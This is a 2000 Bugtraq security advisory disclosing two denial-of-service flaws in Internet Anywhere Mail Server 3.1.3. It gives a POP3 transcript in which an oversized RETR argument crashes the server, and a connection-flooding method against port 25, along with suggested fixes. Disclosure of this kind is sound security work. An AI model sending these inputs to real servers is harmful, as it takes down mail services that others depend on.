[13792] in bugtraq
remote DoS on Internet Anywhere Mail Server Ver.3.1.3
daemon@ATHENA.MIT.EDU (Nobuo Miwa)
Thu Feb 10 16:17:42 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <200002101853.JBJ65698.-XBNJO@lac.co.jp>
Date: Thu, 10 Feb 2000 18:53:28 +0900
Reply-To: Nobuo Miwa <n-miwa@LAC.CO.JP>
From: Nobuo Miwa <n-miwa@LAC.CO.JP>
X-To: BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
I've reported DoS probrems on Internet Anywhere Mail Server Ver.3.1.3
to support@tnsoft.com on 3rd Dec,99. They started to develop the fix.
But they said "we'll release the fix in couple of weeks" three times.
I've discussed with Jeff Moll(President of True North Software, Inc.)
and he allowed me to post these vulnerabilities.
1. RETR DoS in POP service
+OK POP3 Welcome to somewhere.domain using the Internet Anywhere
Mail Server Version: 3.1.3. Build: 1065 by True North Software,
Inc.
USER yellow
+OK valid
PASS pikapika
+OK Authorized
RETR 111111111111111111111111
That's all. The Server could be dead at a little bit after
atoi(). They should check return value of atoi().
2. multiple connections to port 25 DoS
This is simple game, too.
Too much connect()s about 3000, then you will see connection
refused. After that, too much connect()s again about 800, then
you can't connect anymore.
It depends on memory size(I tested on 128MB RAM,total 256MB).
They should check connection status.
Moderator of BUGTRAQ-JP
<Nobuo Miwa> n-miwa@lac.co.jp ( @ @ ) http://www.lac.co.jp/security/
-------------------------------o00o--(. .)--o00o-------------------------
